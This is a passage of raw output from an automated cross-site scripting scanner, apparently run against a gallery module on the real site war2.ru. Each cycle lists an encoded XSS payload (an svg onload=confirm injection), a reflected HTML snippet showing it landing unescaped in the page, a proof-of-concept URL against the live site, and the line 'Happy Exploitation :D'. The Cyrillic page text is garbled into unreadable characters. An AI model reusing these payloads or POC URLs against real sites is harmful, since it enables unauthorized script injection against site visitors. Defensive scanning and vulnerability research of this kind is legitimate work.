width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5909</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  50. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA%78%22%78%3e%78&show=
  51. [*] Happy Exploitation :D
  52. [*] Payload Found . . .
  53. [*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  54. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA">zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA">zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA">zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA">zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' 
cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5910</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  55. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&show=
  56. [*] Happy Exploitation :D
  57. [*] Payload Found . . .
  58. [*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  59. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreAzigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreAzigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreAzigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreAzigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' 
cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5911</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  60. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreAzigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&show=
  61. [*] Happy Exploitation :D
  62. [*] Payload Found . . .
  63. [*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  64. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA&show='>zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA&show='>zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA&show='>zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show='>zigoo0<svg/onload=confirm(/zigoo0/)>web'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' 
cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5912</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  65. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA&show=%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  66. [*] Happy Exploitation :D
  67. [*] Payload Found . . .
  68. [*] Payload: %78%22%78%3e%78
  69. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA&show=x"x>x'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA&show=x"x>x'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA&show=x"x>x'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=x"x>x'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td 
width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5913</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  70. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA&show=%78%22%78%3e%78
  71. [*] Happy Exploitation :D
  72. [*] Payload Found . . .
  73. [*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  74. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA&show=">zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA&show=">zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA&show=">zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=">zigoo0<svg/onload=confirm(/zigoo0/)>web'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' 
cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5914</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  75. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA&show=%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  76. [*] Happy Exploitation :D
  77. [*] Payload Found . . .
  78. [*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  79. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA&show=zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA&show=zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA&show=zigoo0<svg/onload=confirm(/zigoo0/)>web'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=zigoo0<svg/onload=confirm(/zigoo0/)>web'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' 
align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5915</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  80. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA&show=zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb